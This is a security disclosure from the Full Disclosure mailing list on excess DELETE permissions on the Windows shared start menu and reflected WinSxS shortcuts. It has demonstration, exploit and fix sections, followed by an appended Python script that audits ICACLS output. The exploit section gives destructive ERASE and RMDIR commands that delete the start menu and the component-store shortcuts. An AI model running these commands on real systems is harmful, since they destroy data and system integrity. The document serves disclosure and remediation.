Hi @ll, the following is a condensed form of <https://skanthak.hier-im-netz.de/whispers.html#whisper3> and <https://skanthak.hier-im-netz.de/whispers.html#whisper4>.
Windows Vista moved the shared start menu from "%ALLUSERSPROFILE%\Start Menu\" to "%ProgramData%\Microsoft\Windows\Start Menu\", with some shortcuts (*.lnk) "reflected" from the (immutable) component store below %SystemRoot%\WinSxS\

JFTR: "reflection" is M$FT lingo for hardlink into the component store.

Before this move only Administrators had write access to the shared start menu; afterwards at least the user account(s) created during Windows setup (OOBE, out of box experience) are granted DELETE and DELETE_CHILD access permission.

Demonstration
~~~~~~~~~~~~~

Log on to an arbitrary (unprivileged) user account, start the command processor and run the following command line to display the access permissions of the shared start menu:

ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu"

C:\ProgramData\Microsoft\Windows\Start Menu COMPUTER\User:(OI)(CI)(IO)(DE,DC)
                                            S-1-5-21-xxx-yyy-zzz-1000:(OI)(CI)(IO)(DE,DC)
                                            COMPUTER\Administrator:(OI)(CI)(IO)(DE,DC)
                                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                            BUILTIN\Administrators:(I)(OI)(CI)(F)
                                            BUILTIN\Users:(I)(OI)(CI)(RX)
                                            Everyone:(I)(OI)(CI)(RX)

Instead of "COMPUTER" you get your computer name (see the environment variables %COMPUTERNAME% and %USERDOMAIN%); instead of "User" and "Administrator" you get the first/primary and the localized administrator account name.

"(OI)(CI)(IO)(DE,DC)" means "inherit DELETE and DELETE CHILD access permission to all objects/files and containers/directories below this directory".

Run the following command line to confirm the latter:

ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" /C /Q /T | FINDSTR.EXE /L "%ProgramData% (DE,DC)"

"Thanks" to the braindead "reflection" of shortcuts (generally: files) from the component store their access permissions are changed too:

ICACLS.EXE "%SystemRoot%\WinSxS\*.lnk" /C /Q /T | FINDSTR.EXE /L "%SystemRoot% (DE,DC)"

Exploit
~~~~~~~

"Thanks" to the DELETE_CHILD access permission some unprivileged users can for NINETEEN years remove the shared start menu COMPLETELY!

ERASE /A:HS /F /Q /S "%ProgramData%\Microsoft\Windows\Start Menu\desktop.ini"
ERASE /F /Q /S "%ProgramData%\Microsoft\Windows\Start Menu\*.lnk"
RMDIR /Q /S "%ProgramData%\Microsoft\Windows\Start Menu"

"Thanks" to the braindead "reflection" of shortcuts (generally: files) from the component store the same unprivileged users can also erase them there and destroy the integrity of the component store:

ERASE /F /Q /S "%SystemRoot%\WinSxS\*.lnk"

Fix
~~~

Remove the SUPERFLUOUS access permissions (needs SE_RESTORE_PRIVILEGE):

ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" /C /Q /Remove:g "%USERDOMAIN%\Administrator" "%USERDOMAIN%\%USERNAME%" "%USERDOMAIN%\User" *S-1-5-21-xxx-yyy-zzz-RID ... /T
ICACLS.EXE "%SystemRoot%\WinSxS\*.lnk" /C /Q /Remove:g "%USERDOMAIN%\Administrator" "%USERDOMAIN%\%USERNAME%" "%USERDOMAIN%\User" *S-1-5-21-xxx-yyy-zzz-RID ... /T

stay tuned, and far away from unprotected system( file)s
Stefan Kanthak

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
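Added example, not part of the post and not Stefan Kanthak's code: a small Python audit that parses the ICACLS output shown in the Demonstration section (feed it the output of ICACLS.EXE ... /C /Q /T), flags every allow ACE that grants a delete-capable right (F, M, D, DE, DC) to a principal other than SYSTEM, Administrators and TrustedInstaller, and composes the ICACLS /Remove:g command line from the Fix section for exactly those principals. The sample output, the numeric SID and the shortcut name are constructed; the TRUSTED set and the assumption that machine/domain account names contain no spaces are mine, not the post's.

```python
import re
from typing import FrozenSet, Iterable, List, NamedTuple

# Constructed sample in the shape ICACLS /T prints it (one object per block, the first
# ACE on the path line, the others indented). Principal names follow the post; the SID
# and the shortcut name are made up for this example.
SAMPLE_ICACLS_OUTPUT = r"""C:\ProgramData\Microsoft\Windows\Start Menu COMPUTER\User:(OI)(CI)(IO)(DE,DC)
                                            S-1-5-21-1111111111-2222222222-3333333333-1000:(OI)(CI)(IO)(DE,DC)
                                            COMPUTER\Administrator:(OI)(CI)(IO)(DE,DC)
                                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                            BUILTIN\Administrators:(I)(OI)(CI)(F)
                                            BUILTIN\Users:(I)(OI)(CI)(RX)
                                            Everyone:(I)(OI)(CI)(RX)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Example Tool.lnk COMPUTER\User:(I)(DE,DC)
                                                                      NT AUTHORITY\SYSTEM:(I)(F)
                                                                      BUILTIN\Administrators:(I)(F)
                                                                      BUILTIN\Users:(I)(RX)
                                                                      Everyone:(I)(RX)
Successfully processed 2 files; Failed processing 0 files
"""

# Principals as ICACLS prints them: "AUTHORITY\name" (some authorities contain spaces),
# a bare SID when the account no longer resolves, or a well-known name without a
# backslash. Assumption (mine): machine/domain account names contain no spaces, so
# "COMPUTER\John Doe" would not parse and its line is skipped.
PRINCIPAL = (
    r"(?:NT AUTHORITY|NT SERVICE|BUILTIN|APPLICATION PACKAGE AUTHORITY)\\[^\\:]+"
    r"|S-1-(?:\d+-)*\d+"
    r"|Everyone|CREATOR OWNER"
    r"|[^\s\\:]+\\[^\s\\:]+"
)
# Path (lazy, may contain spaces), whitespace, principal, ':', then one or more "(...)" groups.
LINE_RE = re.compile(r"(?P<path>.*?)\s+(?P<principal>" + PRINCIPAL + r"):(?P<rights>(?:\([^()]*\))+)\s*")

INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# ICACLS rights that allow deleting the object itself or entries below it.
DELETE_CAPABLE = {"F", "M", "D", "DE", "DC"}
# Principals expected to hold full control over the shared start menu (my choice);
# any other principal with a delete-capable grant is what the post calls SUPERFLUOUS.
TRUSTED = frozenset({"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators", "NT SERVICE\\TrustedInstaller"})


class Ace(NamedTuple):
    path: str
    principal: str
    inherit: FrozenSet[str]   # subset of (I)(OI)(CI)(IO)(NP)
    rights: FrozenSet[str]    # e.g. {"DE", "DC"} or {"F"}
    deny: bool                # ICACLS prints (DENY) for deny ACEs


def parse_icacls(text: str) -> List[Ace]:
    """Parse ICACLS output (with or without /T) into one Ace per printed entry."""
    aces: List[Ace] = []
    current_path = ""
    for line in text.splitlines():
        m = LINE_RE.fullmatch(line)
        if not m:
            continue  # blank line, "Successfully processed ..." summary, or unparseable
        if m.group("path").strip():
            current_path = m.group("path").strip()  # new object; indented lines belong to it
        tokens = re.findall(r"\(([^()]*)\)", m.group("rights"))
        rights = set()
        for t in tokens:
            if t not in INHERIT_FLAGS and t != "DENY":
                rights.update(r.strip() for r in t.split(","))
        aces.append(Ace(current_path, m.group("principal"),
                        frozenset(t for t in tokens if t in INHERIT_FLAGS),
                        frozenset(rights), "DENY" in tokens))
    return aces


def find_excess_delete_grants(aces: Iterable[Ace], trusted: FrozenSet[str] = TRUSTED) -> List[Ace]:
    """Allow ACEs that let a principal outside `trusted` delete the object or its children."""
    return [a for a in aces
            if not a.deny and a.principal not in trusted and a.rights & DELETE_CAPABLE]


def build_fix_command(root: str, findings: Iterable[Ace]) -> str:
    """Compose the ICACLS /Remove:g line from the post's Fix section for the flagged
    principals. ICACLS takes raw SIDs with a leading '*'; running the line needs
    SE_RESTORE_PRIVILEGE, i.e. an elevated prompt."""
    principals = sorted({a.principal for a in findings})
    args = " ".join("*" + p if p.startswith("S-1-") else '"%s"' % p for p in principals)
    return 'ICACLS.EXE "%s" /C /Q /T /Remove:g %s' % (root, args)


if __name__ == "__main__":
    found = find_excess_delete_grants(parse_icacls(SAMPLE_ICACLS_OUTPUT))
    for a in found:
        print("%s  %s  %s%s" % (a.path, a.principal, ",".join(sorted(a.rights)),
                                "  (inherited)" if "I" in a.inherit else ""))
    print(build_fix_command(r"C:\ProgramData\Microsoft\Windows\Start Menu", found))
```

On a live system, replace SAMPLE_ICACLS_OUTPUT with the text of ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" /C /Q /T (and the WinSxS\*.lnk variant); entries without the (I) flag are the explicit grants the post describes, inherited ones disappear once the explicit ones on the directory are removed. The local Administrator account is flagged on purpose, matching the post's Fix, which removes it as well.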
